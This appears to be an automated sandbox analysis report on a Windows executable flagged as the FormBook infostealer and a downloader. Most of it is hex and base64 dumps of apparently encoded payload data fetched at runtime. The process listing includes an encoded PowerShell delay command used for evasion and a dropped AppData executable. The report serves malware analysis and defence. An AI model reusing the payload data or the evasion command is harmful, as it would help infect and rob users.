                                                                            Data Ascii: wQABcd+AAAAKiD///oiPxcIEf//+SU4AAAALyAmBgAC8ygDEQAR///5OTgAAAAgIP///644///5SDgAAAAEIAMTlFgBE1gXJQERAwL///lfOAAAAA4gJv//+Wo5BAAFdHsEAAXHfgAAAAUgAAAAmf///X////5KAAAARQAAAARFBRH///mVOAAAAAEgJv//+aA5BAAFn3sEAAXHfgAAAAEg///7xjj///m5OAAAACEgAAABVzmUWAERAwL///nO
                                                                            2023-03-21 08:11:13 UTC5637INData Raw: 33 37 2f 2f 2f 77 37 4f 41 41 41 41 42 63 67 41 41 41 41 61 44 34 41 41 41 45 66 49 41 63 52 2f 2f 2f 38 55 54 67 41 41 41 41 38 49 41 51 41 41 4b 79 41 41 67 41 41 58 49 30 67 48 77 41 41 41 71 30 34 42 41 41 41 73 6f 41 42 41 41 41 44 6a 52 34 66 2f 2f 2f 38 65 44 67 41 41 41 41 4e 49 43 62 2f 2f 2f 79 44 4f 67 51 41 42 62 46 37 42 41 41 46 78 33 34 41 41 41 41 51 49 41 55 54 41 41 41 41 6b 43 44 2f 2f 2f 79 65 4f 41 41 41 41 43 73 67 4a 76 2f 2f 2f 4b 6b 35 42 41 41 46 72 6e 73 45 41 41 58 48 66 67 41 41 41 42 59 67 41 41 41 42 71 44 34 66 48 77 67 52 41 41 41 43 31 54 67 44 45 78 62 2f 2f 2f 7a 4f 4f 41 41 41 41 47 55 67 4a 76 2f 2f 2f 4e 6b 36 42 41 41 46 6d 58 73 45 41 41 58 48 66 67 41 41 41 47 4d 67 6e 67 34 66 45 42 38 45 41 41 43 75 66 76 2f 2f
                                                                            Data Ascii: 37///w7OAAAABcgAAAAaD4AAAEfIAcR///8UTgAAAA8IAQAAKyAAgAAXI0gHwAAAq04BAAAsoABAAADjR4f///8eDgAAAANICb///yDOgQABbF7BAAFx34AAAAQIAUTAAAAkCD///yeOAAAACsgJv///Kk5BAAFrnsEAAXHfgAAABYgAAABqD4fHwgRAAAC1TgDExb///zOOAAAAGUgJv///Nk6BAAFmXsEAAXHfgAAAGMgng4fEB8EAACufv//
                                                                            2023-03-21 08:11:13 UTC5653INData Raw: 62 63 67 2f 2f 2f 2b 35 7a 67 41 41 41 41 42 49 43 62 2f 2f 2f 37 79 4f 67 51 41 42 5a 70 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 41 41 41 42 38 35 41 41 41 4d 2f 76 2f 2f 2f 77 38 34 41 41 41 41 42 53 41 45 41 41 43 65 66 51 45 41 41 44 69 4e 57 52 38 2f 57 46 51 67 59 51 42 78 76 30 30 67 48 30 37 6e 4b 53 41 41 41 41 6e 2b 2f 2f 2f 2f 4f 44 67 41 41 41 41 41 49 43 62 2f 2f 2f 39 44 4f 67 51 41 42 5a 4a 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 41 41 44 76 34 47 41 41 4b 4f 4b 41 59 41 41 6f 30 6f 42 41 41 41 6e 48 34 47 41 41 4b 4d 4b 50 2f 2f 2f 32 38 34 41 41 41 41 42 43 44 2f 2f 2f 2b 62 4f 50 2f 2f 2f 36 41 34 4a 67 6f 41 41 4c 31 76 61 59 34 45 41 41 43 65 65 77 41 41 43 66 35 6c 59 67 41 41 41 41 49 67 41 41 41 41 41 43 41 45 41 41 43 65
                                                                            Data Ascii: bcg///+5zgAAAABICb///7yOgQABZp7BAAFx34AAAAAIAAAAB85AAAM/v///w84AAAABSAEAACefQEAADiNWR8/WFQgYQBxv00gH07nKSAAAAn+////ODgAAAAAICb///9DOgQABZJ7BAAFx34AAAAAIAAADv4GAAKOKAYAAo0oBAAAnH4GAAKMKP///284AAAABCD///+bOP///6A4JgoAAL1vaY4EAACeewAACf5lYgAAAAIgAAAAACAEAACe
                                                                            2023-03-21 08:11:13 UTC5669INData Raw: 38 34 41 41 41 53 41 41 41 41 42 36 67 41 41 42 76 34 41 41 41 4d 36 41 41 41 43 6d 51 41 41 42 6e 6f 41 41 41 62 6a 41 41 41 43 36 51 41 41 41 36 38 41 41 41 54 41 41 41 41 42 78 41 41 41 41 34 77 41 41 41 50 79 41 41 41 43 51 51 41 41 42 50 30 41 41 41 41 46 41 41 41 41 55 41 41 41 42 4c 45 41 41 41 67 46 41 41 41 45 5a 41 41 41 42 54 6b 41 41 41 48 35 41 41 41 46 68 41 41 41 41 79 30 41 41 41 4c 59 41 41 41 42 6d 67 41 41 42 52 6b 41 41 41 54 4f 41 41 41 44 70 77 41 41 41 61 6b 41 41 41 62 57 41 41 41 42 48 77 41 41 41 76 67 41 41 41 56 7a 41 41 41 43 61 67 41 41 41 56 49 41 41 41 61 58 41 41 41 48 38 67 41 41 42 55 4d 41 41 41 4e 2b 41 41 41 48 4b 77 41 41 42 46 4d 41 41 41 41 55 41 41 41 49 44 51 41 41 42 41 45 41 41 41 5a 5a 41 41 41 47 70 51 41 41
                                                                            Data Ascii: 84AAASAAAAB6gAABv4AAAM6AAACmQAABnoAAAbjAAAC6QAAA68AAATAAAABxAAAA4wAAAPyAAACQQAABP0AAAAFAAAAUAAABLEAAAgFAAAEZAAABTkAAAH5AAAFhAAAAy0AAALYAAABmgAABRkAAATOAAADpwAAAakAAAbWAAABHwAAAvgAAAVzAAACagAAAVIAAAaXAAAH8gAABUMAAAN+AAAHKwAABFMAAAAUAAAIDQAABAEAAAZZAAAGpQAA
                                                                            2023-03-21 08:11:13 UTC5685INData Raw: 64 6f 41 41 41 65 49 41 41 41 44 61 77 41 41 42 48 77 41 41 41 55 49 41 41 41 44 68 41 41 41 42 36 77 41 41 41 58 71 41 41 41 44 65 67 41 41 43 48 34 41 41 41 50 4f 41 41 41 42 2b 77 41 41 41 41 55 41 41 41 45 32 41 41 41 41 71 51 41 41 43 41 51 41 41 41 46 32 41 41 41 44 37 67 41 41 41 6c 6b 41 41 41 51 67 41 41 41 44 43 67 41 41 41 76 63 41 41 41 4b 78 41 41 41 47 35 67 41 41 42 70 73 41 41 41 67 6f 41 41 41 43 44 41 41 41 42 56 73 41 41 41 4b 6b 41 41 41 44 4f 51 41 41 42 39 34 41 41 41 55 66 41 41 41 44 4c 67 41 41 41 42 59 41 41 41 5a 33 41 41 41 42 74 67 41 41 41 61 4d 41 41 41 4c 52 41 41 41 41 66 51 41 41 41 55 51 41 41 41 42 48 52 51 41 51 44 50 34 41 41 41 64 78 4f 42 77 54 43 67 41 41 6e 57 38 4b 41 41 43 63 62 77 45 52 41 41 44 2f 2f 2f 2b 35
                                                                            Data Ascii: doAAAeIAAADawAABHwAAAUIAAADhAAAB6wAAAXqAAADegAACH4AAAPOAAAB+wAAAAUAAAE2AAAAqQAACAQAAAF2AAAD7gAAAlkAAAQgAAADCgAAAvcAAAKxAAAG5gAABpsAAAgoAAACDAAABVsAAAKkAAADOQAAB94AAAUfAAADLgAAABYAAAZ3AAABtgAAAaMAAALRAAAAfQAAAUQAAABHRQAQDP4AAAdxOBwTCgAAnW8KAACcbwERAAD///+5
                                                                            2023-03-21 08:11:13 UTC5701INData Raw: 41 41 46 78 33 34 41 41 41 42 42 49 50 2f 2f 2b 35 67 34 2f 2f 2f 34 2f 54 67 41 41 41 42 58 49 41 6b 54 46 77 41 41 42 51 59 34 41 41 41 46 45 54 67 57 2f 2f 2f 35 46 54 67 41 41 41 41 6c 49 43 62 2f 2f 2f 6b 67 4f 51 51 41 42 58 4a 37 42 41 41 46 78 33 34 41 41 41 41 46 49 50 2f 2f 2f 4a 59 34 2f 2f 2f 35 4f 54 67 41 41 41 41 78 49 43 62 2f 2f 2f 6c 45 4f 67 51 41 42 62 70 37 42 41 41 46 78 33 34 41 41 41 42 4d 49 41 41 41 41 57 63 34 2f 2f 2f 35 58 54 67 41 41 41 42 52 49 43 62 2f 2f 2f 6c 6f 4f 67 51 41 42 63 70 37 42 41 41 46 78 33 34 41 41 41 42 59 49 50 2f 2f 2f 2b 63 36 41 52 45 41 41 41 56 33 4f 41 41 41 42 58 30 34 42 67 41 43 47 53 67 71 41 52 45 41 41 41 49 35 4f 50 2f 2f 2f 72 6f 34 2f 2f 2f 35 6e 7a 67 41 41 41 41 72 49 41 63 54 2b 42 2f 2f
                                                                            Data Ascii: AAFx34AAABBIP//+5g4///4/TgAAABXIAkTFwAABQY4AAAFETgW///5FTgAAAAlICb///kgOQQABXJ7BAAFx34AAAAFIP///JY4///5OTgAAAAxICb///lEOgQABbp7BAAFx34AAABMIAAAAWc4///5XTgAAABRICb///loOgQABcp7BAAFx34AAABYIP///+c6AREAAAV3OAAABX04BgACGSgqAREAAAI5OP///ro4///5nzgAAAArIAcT+B//
                                                                            2023-03-21 08:11:13 UTC5717INData Raw: 33 73 41 41 41 5a 65 41 41 41 42 59 51 41 41 42 68 6b 41 41 41 4b 56 41 41 41 44 72 51 41 41 41 45 30 41 41 41 42 57 41 41 41 47 65 51 41 41 42 4e 59 41 41 41 4b 4c 41 41 41 47 73 67 41 41 42 4c 49 41 41 41 69 4d 41 41 41 46 35 41 41 41 42 53 55 41 41 41 42 35 41 41 41 44 44 77 41 41 42 71 4d 41 41 41 54 76 41 41 41 41 42 51 41 41 42 48 38 41 41 41 63 47 41 41 41 43 39 67 41 41 42 65 30 41 41 41 64 59 41 41 41 43 75 51 41 41 41 4b 34 41 41 41 51 42 41 41 41 45 45 41 41 41 42 6f 4d 41 41 41 56 2b 41 41 41 43 43 41 41 41 42 44 77 41 41 41 66 6b 41 41 41 43 59 51 41 41 42 38 30 41 41 41 42 71 41 41 41 44 6b 51 41 41 42 44 49 41 41 41 45 2b 41 41 41 41 2b 41 41 41 42 67 67 41 41 41 59 2b 41 41 41 43 7a 51 41 41 42 4f 41 41 41 41 58 39 41 41 41 41 50 41 41 41
                                                                            Data Ascii: 3sAAAZeAAABYQAABhkAAAKVAAADrQAAAE0AAABWAAAGeQAABNYAAAKLAAAGsgAABLIAAAiMAAAF5AAABSUAAAB5AAADDwAABqMAAATvAAAABQAABH8AAAcGAAAC9gAABe0AAAdYAAACuQAAAK4AAAQBAAAEEAAABoMAAAV+AAACCAAABDwAAAfkAAACYQAAB80AAABqAAADkQAABDIAAAE+AAAA+AAABggAAAY+AAACzQAABOAAAAX9AAAAPAAA
                                                                            2023-03-21 08:11:13 UTC5733INData Raw: 2f 6a 2b 4f 41 41 41 41 41 38 67 2f 2f 2f 39 4f 7a 6a 2f 2f 2f 6b 4e 4f 41 41 41 41 43 55 67 4a 76 2f 2f 2b 52 67 36 42 41 41 46 73 33 73 45 41 41 58 48 66 67 41 41 41 44 49 67 43 78 4f 45 48 2f 2f 2f 2b 54 41 34 41 41 41 41 42 69 44 2f 2f 2f 35 55 4f 50 2f 2f 2f 50 73 34 43 68 4d 57 41 41 41 42 74 7a 6a 2f 2f 2f 36 62 4f 50 2f 2f 2b 56 45 34 41 41 41 41 41 53 41 6d 2f 2f 2f 35 58 44 6f 45 41 41 57 75 65 77 51 41 42 63 64 2b 41 41 41 41 49 43 41 45 45 78 58 2f 2f 2f 75 75 4f 41 41 41 41 67 48 2f 2f 2f 77 39 2f 2f 2f 37 2b 66 2f 2f 2f 54 30 41 41 41 41 45 52 56 6c 42 48 77 45 52 2f 2f 2f 35 6b 6a 67 41 41 41 41 4b 49 43 62 2f 2f 2f 6d 64 4f 67 51 41 42 59 68 37 42 41 41 46 78 33 34 41 41 41 41 4b 49 50 2f 2f 2f 47 55 34 2f 2f 2f 35 74 6a 67 41 41 41 41 61
                                                                            Data Ascii: /j+OAAAAA8g///9Ozj///kNOAAAACUgJv//+Rg6BAAFs3sEAAXHfgAAADIgCxOEH///+TA4AAAABiD///5UOP///Ps4ChMWAAABtzj///6bOP//+VE4AAAAASAm///5XDoEAAWuewQABcd+AAAAICAEExX///uuOAAAAgH///w9///7+f///T0AAAAERVlBHwER///5kjgAAAAKICb///mdOgQABYh7BAAFx34AAAAKIP///GU4///5tjgAAAAa
                                                                            2023-03-21 08:11:13 UTC5749INData Raw: 32 55 41 41 41 42 61 41 41 41 41 54 51 41 41 41 4d 41 41 41 41 4a 34 41 41 41 45 39 77 41 41 41 4c 63 41 41 41 4e 30 41 41 41 47 30 51 41 41 41 65 45 41 41 41 4b 38 41 41 41 43 56 41 41 41 41 2f 77 41 41 41 49 38 41 41 41 42 6a 67 41 41 43 4e 59 41 41 41 65 65 41 41 41 48 77 67 41 41 41 55 77 41 41 41 43 72 41 41 41 45 71 77 41 41 42 55 6f 41 41 41 4a 47 41 41 41 45 78 67 41 41 42 47 45 41 41 41 43 4c 41 41 41 43 32 41 41 41 43 44 6f 41 41 41 51 6f 41 41 41 43 47 41 41 41 41 48 34 41 41 41 52 59 41 41 41 41 51 6b 55 41 46 51 7a 2b 41 41 41 41 42 44 67 41 41 41 41 4f 49 43 59 41 41 41 41 50 4f 67 51 41 42 58 74 37 42 41 41 46 78 33 34 41 41 41 41 69 49 41 41 41 43 53 55 34 41 41 41 41 41 41 41 4c 4c 54 67 41 41 41 73 79 41 41 41 41 41 55 55 41 43 77 7a 2b
                                                                            Data Ascii: 2UAAABaAAAATQAAAMAAAAJ4AAAE9wAAALcAAAN0AAAG0QAAAeEAAAK8AAACVAAAA/wAAAI8AAABjgAACNYAAAeeAAAHwgAAAUwAAACrAAAEqwAABUoAAAJGAAAExgAABGEAAACLAAAC2AAACDoAAAQoAAACGAAAAH4AAARYAAAAQkUAFQz+AAAABDgAAAAOICYAAAAPOgQABXt7BAAFx34AAAAiIAAACSU4AAAAAAALLTgAAAsyAAAAAUUACwz+
                                                                            2023-03-21 08:11:13 UTC5765INData Raw: 41 41 41 44 53 41 47 45 2f 73 66 41 41 41 42 38 6a 6a 2f 2f 2f 2b 6d 4f 50 2f 2f 2f 78 51 34 41 41 41 43 4e 54 67 41 41 50 2f 2f 2f 49 67 34 41 41 41 41 51 53 41 6d 2f 2f 2f 38 6b 7a 6b 45 41 41 56 37 65 77 51 41 42 63 64 2b 41 41 41 41 4e 43 41 41 41 41 4f 35 4f 50 2f 2f 2f 4b 77 34 41 41 41 41 42 69 41 46 45 2f 63 66 2f 2f 2f 38 75 6a 67 41 41 41 41 7a 49 41 51 54 64 42 38 41 41 41 58 6c 4f 41 77 54 2b 52 2f 2f 2f 2f 7a 52 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2f 4e 77 36 42 41 41 46 68 6e 73 45 41 41 58 48 66 67 41 41 41 45 59 67 41 41 41 43 63 44 67 41 41 41 46 70 4f 41 4d 54 68 68 2f 2f 2f 2f 7a 2b 4f 41 41 41 41 42 67 67 2f 2f 2f 2f 56 7a 6a 2f 2f 2f 30 4e 4f 41 41 41 41 44 55 67 4a 76 2f 2f 2f 52 67 36 42 41 41 46 6d 58 73 45 41 41 58 48 66 67 41 41
                                                                            Data Ascii: AAADSAGE/sfAAAB8jj///+mOP///xQ4AAACNTgAAP///Ig4AAAAQSAm///8kzkEAAV7ewQABcd+AAAANCAAAAO5OP///Kw4AAAABiAFE/cf///8ujgAAAAzIAQTdB8AAAXlOAwT+R////zROAAAAAAgJv///Nw6BAAFhnsEAAXHfgAAAEYgAAACcDgAAAFpOAMThh////z+OAAAABgg////Vzj///0NOAAAADUgJv///Rg6BAAFmXsEAAXHfgAA
                                                                            2023-03-21 08:11:13 UTC5781INData Raw: 2f 75 56 4f 41 41 41 41 44 63 67 2f 2f 2f 2f 59 54 6a 2f 2f 2f 75 6b 4f 41 41 41 41 41 34 67 42 42 4f 44 48 2f 2f 2f 2b 37 49 34 41 41 41 41 47 69 44 2f 2f 2f 39 50 4f 50 2f 2f 2b 38 45 34 41 41 41 41 49 43 41 6d 2f 2f 2f 37 7a 44 6b 45 41 41 57 71 65 77 51 41 42 63 64 2b 41 41 41 41 48 79 41 41 41 41 45 66 4f 50 2f 2f 2b 2b 55 34 41 41 41 41 4e 53 41 47 45 34 63 66 2f 2f 2f 37 38 7a 67 41 41 41 41 4d 49 41 51 54 67 68 2f 2f 2f 2f 77 42 4f 41 41 41 41 42 59 67 4a 76 2f 2f 2f 41 77 36 42 41 41 46 6e 33 73 45 41 41 58 48 66 67 41 41 41 41 4d 67 2f 2f 2f 2b 32 54 6a 2f 2f 2f 2b 70 4f 41 45 54 46 76 2f 2f 2f 43 30 34 41 41 41 41 43 53 41 42 45 32 45 39 48 77 45 52 2f 2f 2f 2f 4d 54 67 48 45 33 6f 66 2f 2f 2f 38 52 7a 67 41 41 41 41 41 49 43 62 2f 2f 2f 78 53
                                                                            Data Ascii: /uVOAAAADcg////YTj///ukOAAAAA4gBBODH///+7I4AAAAGiD///9POP//+8E4AAAAICAm///7zDkEAAWqewQABcd+AAAAHyAAAAEfOP//++U4AAAANSAGE4cf///78zgAAAAMIAQTgh////wBOAAAABYgJv///Aw6BAAFn3sEAAXHfgAAAAMg///+2Tj///+pOAETFv///C04AAAACSABE2E9HwER////MTgHE3of///8RzgAAAAAICb///xS
                                                                            2023-03-21 08:11:13 UTC5797INData Raw: 2f 2f 36 58 44 6f 45 41 41 57 73 65 77 51 41 42 63 64 2b 41 41 41 41 58 79 41 75 45 32 46 44 48 79 34 52 41 41 41 4e 38 6a 67 41 41 41 33 39 4f 42 59 41 41 41 4f 49 4f 41 41 41 44 75 67 34 41 41 41 47 72 44 67 50 45 31 67 6f 48 77 38 52 41 48 6f 4b 41 41 42 53 63 2f 2f 2f 2b 70 38 34 41 41 41 41 57 69 41 73 45 2f 67 66 2f 2f 2f 36 72 54 67 41 41 41 41 73 49 41 41 41 42 38 38 34 2f 2f 2f 39 56 6a 67 64 45 77 48 2b 46 67 59 41 41 49 64 76 41 68 49 4d 45 51 41 52 4e 52 45 45 41 41 41 4c 65 77 51 52 42 41 41 41 4b 48 35 36 43 67 41 41 55 6e 50 2f 2f 2f 72 6c 4f 41 41 41 41 41 67 67 4a 76 2f 2f 2b 76 41 36 42 41 41 46 6e 33 73 45 41 41 58 48 66 67 41 41 41 41 51 67 4c 52 4d 61 2f 2f 2f 37 42 7a 67 41 41 41 42 65 49 41 38 54 57 41 41 41 41 50 67 67 42 68 46 36
                                                                            Data Ascii: //6XDoEAAWsewQABcd+AAAAXyAuE2FDHy4RAAAN8jgAAA39OBYAAAOIOAAADug4AAAGrDgPE1goHw8RAHoKAABSc///+p84AAAAWiAsE/gf///6rTgAAAAsIAAAB884///9VjgdEwH+FgYAAIdvAhIMEQARNREEAAALewQRBAAAKH56CgAAUnP///rlOAAAAAggJv//+vA6BAAFn3sEAAXHfgAAAAQgLRMa///7BzgAAABeIA8TWAAAAPggBhF6
                                                                            2023-03-21 08:11:13 UTC5813INData Raw: 41 41 41 41 42 4d 67 4a 76 2f 2f 2b 32 55 35 42 41 41 46 73 48 73 45 41 41 58 48 66 67 41 41 41 44 67 67 2f 2f 2f 38 78 54 6a 2f 2f 2f 74 2b 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2b 34 6b 35 42 41 41 46 6e 6e 73 45 41 41 58 48 66 67 41 41 41 41 41 67 41 78 4e 68 51 52 38 44 45 66 2f 2f 2b 36 51 34 41 41 41 41 4d 79 44 2f 2f 2f 2b 43 4f 50 2f 2f 2b 37 4d 34 41 41 41 41 4c 69 41 6d 2f 2f 2f 37 76 6a 6f 45 41 41 57 55 65 77 51 41 42 63 64 2b 41 41 41 41 48 43 41 41 41 41 41 75 4f 50 2f 2f 2b 39 63 34 41 41 41 41 49 79 41 41 41 41 4c 38 2f 2f 2f 39 2b 76 2f 2f 2f 61 6f 41 41 41 41 44 52 56 67 39 48 77 4d 52 2f 2f 2f 37 39 7a 67 41 41 41 41 38 49 50 2f 2f 2f 58 41 34 2f 2f 2f 38 42 6a 67 41 41 41 41 68 49 43 62 2f 2f 2f 77 52 4f 51 51 41 42 59 64 37 42 41 41 46
                                                                            Data Ascii: AAAABMgJv//+2U5BAAFsHsEAAXHfgAAADgg///8xTj///t+OAAAAAAgJv//+4k5BAAFnnsEAAXHfgAAAAAgAxNhQR8DEf//+6Q4AAAAMyD///+COP//+7M4AAAALiAm///7vjoEAAWUewQABcd+AAAAHCAAAAAuOP//+9c4AAAAIyAAAAL8///9+v///aoAAAADRVg9HwMR///79zgAAAA8IP///XA4///8BjgAAAAhICb///wROQQABYd7BAAF
                                                                            2023-03-21 08:11:13 UTC5829INData Raw: 4f 61 64 49 48 41 41 42 61 46 79 41 67 59 41 41 53 55 6f 41 41 44 74 68 43 42 77 41 41 56 56 63 67 6f 41 41 44 4e 76 43 78 48 2f 2f 2f 77 4e 4f 41 41 41 41 42 67 67 4a 76 2f 2f 2f 42 67 36 42 41 41 46 78 58 73 45 41 41 58 48 66 67 41 41 41 41 59 67 2f 2f 2f 39 58 54 6a 2f 2f 2f 77 78 4f 41 41 41 41 44 6b 67 4a 76 2f 2f 2f 44 77 36 42 41 41 46 6d 6e 73 45 41 41 58 48 66 67 41 41 41 44 6b 67 41 41 41 43 5a 77 41 41 42 46 45 41 41 41 4c 62 41 41 41 41 41 30 56 5a 50 42 38 48 45 51 41 41 41 61 51 34 41 41 41 43 66 7a 6a 2f 2f 2f 78 77 4f 41 41 41 41 42 6b 67 4a 76 2f 2f 2f 48 73 35 42 41 41 46 71 48 73 45 41 41 58 48 66 67 41 41 41 41 6f 67 41 41 41 42 48 54 6a 2f 2f 2f 79 55 4f 41 41 41 41 43 77 67 4a 76 2f 2f 2f 4a 38 35 42 41 41 46 75 33 73 45 41 41 58 48
                                                                            Data Ascii: OadIHAABaFyAgYAASUoAADthCBwAAVVcgoAADNvCxH///wNOAAAABggJv///Bg6BAAFxXsEAAXHfgAAAAYg///9XTj///wxOAAAADkgJv///Dw6BAAFmnsEAAXHfgAAADkgAAACZwAABFEAAALbAAAAA0VZPB8HEQAAAaQ4AAACfzj///xwOAAAABkgJv///Hs5BAAFqHsEAAXHfgAAAAogAAABHTj///yUOAAAACwgJv///J85BAAFu3sEAAXH
                                                                            2023-03-21 08:11:13 UTC5845INData Raw: 2f 79 45 4f 50 2f 2f 2b 65 6b 34 41 41 41 41 43 69 41 6d 2f 2f 2f 35 39 44 6f 45 41 41 56 38 65 77 51 41 42 63 64 2b 41 41 41 41 41 69 41 44 45 32 45 36 48 77 4d 52 2f 2f 2f 36 44 7a 67 41 41 41 41 53 49 41 41 41 41 68 67 34 2f 2f 2f 36 47 6a 67 41 42 77 37 2b 41 41 41 41 4b 53 41 4a 45 34 4d 66 2f 2f 2f 36 4d 44 67 41 41 41 41 53 49 43 62 2f 2f 2f 6f 37 4f 51 51 41 42 5a 74 37 42 41 41 46 78 33 34 41 41 41 42 4b 49 41 55 54 59 54 67 66 42 52 48 2f 2f 2f 70 57 4f 41 41 41 41 44 38 67 41 41 41 44 36 44 6a 2f 2f 2f 70 6c 4f 41 41 41 41 45 41 67 4a 76 2f 2f 2b 6e 41 35 42 41 41 46 75 6e 73 45 41 41 58 48 66 67 41 41 41 44 59 67 41 68 4e 38 48 2f 2f 2f 2f 4f 4d 34 41 41 41 43 6a 44 6a 2f 2f 2f 71 53 4f 41 41 41 41 44 73 67 2f 2f 2f 39 6d 2f 2f 2f 2f 57 76 2f
                                                                            Data Ascii: /yEOP//+ek4AAAACiAm///59DoEAAV8ewQABcd+AAAAAiADE2E6HwMR///6DzgAAAASIAAAAhg4///6GjgABw7+AAAAKSAJE4Mf///6MDgAAAASICb///o7OQQABZt7BAAFx34AAABKIAUTYTgfBRH///pWOAAAAD8gAAAD6Dj///plOAAAAEAgJv//+nA5BAAFunsEAAXHfgAAADYgAhN8H////OM4AAACjDj///qSOAAAADsg///9m////Wv/
                                                                            2023-03-21 08:11:13 UTC5861INData Raw: 41 42 74 49 43 62 2f 2f 2f 73 54 4f 67 51 41 42 5a 5a 37 42 41 41 46 78 33 34 41 41 41 41 77 49 41 41 41 43 33 49 34 2f 2f 2f 37 4c 44 67 41 41 41 41 33 49 41 59 41 41 53 73 6f 2f 2f 2f 37 4f 7a 67 41 41 41 41 4a 49 43 62 2f 2f 2f 74 47 4f 67 51 41 42 62 6c 37 42 41 41 46 78 33 34 41 41 41 41 4d 49 41 41 41 41 67 63 34 41 41 41 41 41 41 52 55 4f 42 73 54 2b 68 38 41 41 42 42 79 4f 41 41 41 45 48 30 34 46 76 2f 2f 2b 33 55 34 41 41 41 41 54 53 41 59 45 33 34 66 2f 2f 2f 37 67 7a 67 41 41 41 43 4b 49 41 41 41 44 38 30 34 2f 2f 2f 37 6b 6a 67 41 41 41 42 56 49 43 62 2f 2f 2f 75 64 4f 67 51 41 42 5a 64 37 42 41 41 46 78 33 34 41 41 41 42 67 49 41 41 41 43 39 59 41 41 41 6e 69 41 41 41 4e 4f 67 41 41 41 41 4e 46 57 54 34 66 47 42 48 2f 2f 2f 76 44 4f 41 41 51
                                                                            Data Ascii: ABtICb///sTOgQABZZ7BAAFx34AAAAwIAAAC3I4///7LDgAAAA3IAYAASso///7OzgAAAAJICb///tGOgQABbl7BAAFx34AAAAMIAAAAgc4AAAAAARUOBsT+h8AABByOAAAEH04Fv//+3U4AAAATSAYE34f///7gzgAAACKIAAAD804///7kjgAAABVICb///udOgQABZd7BAAFx34AAABgIAAAC9YAAAniAAANOgAAAANFWT4fGBH///vDOAAQ


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:09:10:07
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Imagebase:0xcf0000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            General

                                                                            Target ID:1
                                                                            Start time:09:10:18
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                                                            Imagebase:0xdd0000
                                                                            File size:430592 bytes
                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:2
                                                                            Start time:09:10:18
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7fcd70000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:3
                                                                            Start time:09:10:45
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\Desktop\SC_0017384.exe
                                                                            Imagebase:0xc20000
                                                                            File size:692224 bytes
                                                                            MD5 hash:F296A60E1568722B060DE70B46357FE6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            Reputation:low

                                                                            General

                                                                            Target ID:4
                                                                            Start time:09:10:48
                                                                            Start date:21/03/2023
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                            Imagebase:0x7ff69bc80000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Target ID:5
                                                                            Start time:09:10:57
                                                                            Start date:21/03/2023
                                                                            Path:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            Wow64 process (32bit):true
